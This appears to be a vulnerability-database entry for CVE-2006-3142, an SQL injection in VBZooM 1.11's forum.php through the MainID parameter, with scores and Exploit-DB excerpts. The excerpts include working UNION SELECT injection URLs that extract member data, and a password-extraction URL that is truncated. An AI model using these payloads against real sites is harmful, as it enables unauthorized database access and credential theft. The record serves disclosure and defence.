CVE-2006-3142
Published: 2006-06-22
CVE-2006-3142: SQL injection vulnerability in forum.php in VBZooM 1.11 allows remote attackers to execute arbitrary SQL commands via the MainID parameter.
Priority P338 | high | 7.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.12% (62.0th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbzoom | vbzoom | — | — |
No detection rules found.
Exploit-DB
vbzoom 1.x - 'forum.php?MainID' SQL Injection
exploitdb·2007-07-02
---
vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities
Found By : Cold z3ro
Homepages :
Exploit-DB
VBZoom 1.11 - 'forum.php' SQL Injection
exploitdb·2006-06-15
---
source: https://www.securityfocus.com/bid/18472/info
VBZooM is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
For user :
http://www.example.com/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*
Or
http://www.example.com/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*
For Password :
http://www.example.com/forum.php?MainID=-1%20union%20
No writeups or analysis indexed.
http://securityreason.com/securityalert/1122
http://www.securityfocus.com/archive/1/437575/100/0/threaded
http://www.securityfocus.com/bid/18472
https://exchange.xforce.ibmcloud.com/vulnerabilities/27700
https://www.exploit-db.com/exploits/4140